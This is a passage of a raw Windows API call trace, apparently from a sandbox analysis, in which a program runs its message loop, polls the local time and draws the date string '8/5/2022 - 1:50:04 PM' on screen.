wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2a4)) [0133.935] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2a4)) [0133.935] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.950] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.950] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.950] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2b2)) [0133.950] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2b3)) [0133.950] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.970] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.970] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.970] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2c6)) [0133.970] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2c6)) [0133.970] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.980] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.980] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.980] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2d1)) [0133.980] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2d1)) [0133.981] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.000] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.000] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.000] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2e5)) [0134.001] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2e5)) [0134.001] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.011] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.011] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.011] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2f0)) [0134.011] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x2f0)) [0134.011] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.033] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.033] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.033] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x306)) [0134.033] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x306)) [0134.034] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.043] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.043] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.043] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x310)) [0134.043] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x310)) [0134.044] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.065] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.065] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.065] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x326)) [0134.065] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x326)) [0134.065] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.075] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.075] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.075] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x330)) [0134.075] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x330)) [0134.076] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.097] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.097] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.097] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x346)) [0134.097] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x346)) [0134.098] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.109] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.109] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.110] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x352)) [0134.110] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x352)) [0134.110] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.122] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.122] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.122] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x35f)) [0134.122] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x35f)) [0134.122] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.142] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.142] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.142] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x373)) [0134.143] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x373)) [0134.143] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.152] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.152] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.152] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x37d)) [0134.153] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x37d)) [0134.153] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.179] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.179] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.179] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x397)) [0134.179] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x398)) [0134.179] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.188] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.188] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.188] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3a1)) [0134.189] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3a1)) [0134.189] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.199] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.199] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.199] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3ac)) [0134.200] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3ac)) [0134.200] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.220] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.220] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.220] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3c1)) [0134.220] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3c1)) [0134.221] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.230] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.230] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.230] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3cb)) [0134.231] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3cb)) [0134.231] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.251] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.252] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.252] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3e0)) [0134.252] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x3e0)) [0134.252] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.262] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.262] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.262] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x3)) [0134.263] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x3)) [0134.263] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0134.263] GetDC (hWnd=0x0) returned 0xa0100d0 [0134.263] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0134.263] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0134.263] GetSysColor (nIndex=8) returned 0x0 [0134.263] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0134.264] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0134.264] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0134.264] UnrealizeObject (h=0x2d10099f) returned 1 [0134.264] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0134.264] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0134.264] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0134.264] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:04 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:04 PM", lprc=0x19f5bd) returned 13 [0134.265] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0134.265] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0134.265] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0134.265] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0134.265] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0134.265] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.284] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.284] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.284] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x19)) [0134.285] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x19)) [0134.285] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.294] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.294] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.294] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23)) [0134.295] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23)) [0134.295] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.828] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.830] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.830] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23b)) [0134.830] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23b)) [0134.830] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.830] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.830] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.830] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23b)) [0134.830] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x23b)) [0134.832] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0134.841] TranslateMessage (lpMsg=0x2347a14) returned 0 [0134.841] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0134.841] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x246)) [0134.841] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x246)) [0134.841] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.101] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.101] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.101] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x34a)) [0135.101] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x34a)) [0135.101] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.110] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.110] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.110] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x353)) [0135.110] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x353)) [0135.110] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.125] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.125] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.125] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x362)) [0135.125] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x362)) [0135.125] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.144] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.144] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.144] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x375)) [0135.144] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x375)) [0135.144] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.159] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.159] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.159] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x384)) [0135.159] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x384)) [0135.159] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.176] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.176] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.176] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x395)) [0135.176] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x395)) [0135.176] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.186] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.186] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.186] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x39f)) [0135.187] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x4, wMilliseconds=0x39f)) [0135.187] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.676] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.676] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.676] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1a1)) [0135.676] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1a1)) [0135.676] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0135.676] GetDC (hWnd=0x0) returned 0xa0100d0 [0135.676] MoveToEx (in: hdc=0xa0100d0, x=0, 